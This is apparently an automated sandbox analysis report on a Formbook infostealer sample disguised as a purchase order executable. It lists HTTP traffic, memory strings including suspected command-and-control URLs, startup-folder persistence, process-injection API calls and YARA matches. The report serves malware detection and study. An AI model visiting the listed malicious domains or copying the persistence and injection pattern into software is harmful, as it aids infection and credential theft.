    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 28 Nov 2024 17:57:24 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 28 Nov 2024 17:57:27 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 28 Nov 2024 17:57:30 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 28 Nov 2024 18:02:32 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found
    Server: nginx
    Date: Thu, 28 Nov 2024 18:02:35 GMT
    Content-Type: text/html
    Content-Length: 146
    Connection: close
    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
    Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: PO# 81136575.exe, 00000000.00000002.1263148906.00000000703F1000.00000020.00000001.01000000.00000009.sdmp | String found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
                Source: sages.exe, 00000016.00000002.5956179976.00000000008FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://go.microsoft.c
                Source: sage.exe, 0000000E.00000002.6029462311.000000000F382000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000006FF2000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: http://homebizsuccess.blog/sn35/?VX=2Ljw85fE62irHv4CO6sOxtyqmKbvzO49yiJy4Znj95Je
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: PO# 81136575.exe, 00000000.00000002.1257906767.0000000005F32000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://purl.oen
                Source: sage.exe, 00000011.00000002.6049294447.00000000058A1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://purl.oen=9
                Source: sage.exe, 0000000E.00000002.6012035049.00000000058E2000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://purl.oenS5
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.Slwmarketing.online
                Source: sage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.homebizsuccess.blog
                Source: sage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.homebizsuccess.blog/sn35/
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.slwmarketing.online/Exchange.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wcie
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.slwmarketing.online/Internet_Search_Engines.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.slwmarketing.online/Marketing_Online_Strategy.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tY
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.slwmarketing.online/Small_Business_Financing.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.slwmarketing.online/Trade.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wciee8E
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.slwmarketing.online/__media__/design/underconstructionnotice.php?d=slwmarketing.online
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.slwmarketing.online/__media__/js/trademark.php?d=slwmarketing.online&type=ns
                Source: clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html
                Source: clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.html
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://cdn.consentmanager.net
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://delivery.consentmanager.net
                Source: clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://dts.gnpge.com
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://js.users.51.la/21851687.js
                Source: clip.exe, 00000018.00000002.5955950229.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/
                Source: clip.exe, 00000018.00000002.5955950229.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com//
                Source: clip.exe, 00000018.00000002.5955950229.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com/v104
                Source: clip.exe, 00000018.00000002.5955950229.00000000030CC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: clip.exe, 00000018.00000002.5955950229.00000000030A5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: clip.exe, 00000018.00000003.2907985166.000000000813D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://whois.gandi.net/en/results?search=akravchenko.dev
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/
                Source: sage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmp | String found in binary or memory: https://www.gandi.net/en/domain
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: initial sample | Static PE information: Filename: PO# 81136575.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Process Stats: CPU usage > 6%
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exe | Code function: 14_2_0FCC68C0 NtAllocateVirtualMemory, | 14_2_0FCC68C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_0042C123 NtClose, | 18_2_0042C123
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552BC0 NtQueryInformationToken,LdrInitializeThunk, | 18_2_01552BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552B90 NtFreeVirtualMemory,LdrInitializeThunk, | 18_2_01552B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552A80 NtClose,LdrInitializeThunk, | 18_2_01552A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552D10 NtQuerySystemInformation,LdrInitializeThunk, | 18_2_01552D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_01552EB0 NtProtectVirtualMemory,LdrInitializeThunk, | 18_2_01552EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 18_2_015534E0 NtCreateMutant,LdrInitializeThunk, | 18_2_015534E0
